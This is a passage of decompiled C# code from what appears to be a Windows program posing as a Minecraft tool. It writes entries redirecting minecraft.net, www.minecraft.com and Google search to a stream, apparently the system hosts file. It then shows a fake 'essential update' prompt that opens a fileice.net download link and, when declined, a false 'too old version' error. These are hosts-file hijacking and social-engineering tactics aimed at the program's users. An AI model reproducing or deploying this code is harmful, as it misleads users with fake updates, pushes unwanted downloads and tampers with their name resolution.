		streamWriter.Write(text + " minecraft.net");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.minecraft.com");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.com/search");
		streamWriter.Dispose();
		string fileName = "http://fileice.net/download.php?file=41tow";
		MsgBoxResult val = Interaction.MsgBox((object)"New essential update is out, do you want to download now?", (MsgBoxStyle)4, (object)"Update!");
		if ((int)val == 6)
		{
			Process.Start(fileName);
			((Form)this).Close();
		}
		else if ((int)val == 7)
		{
			Interaction.MsgBox((object)"Too old version! Update please!", (MsgBoxStyle)0, (object)"Error!");
			((Form)this).Close();
		}
	}
}
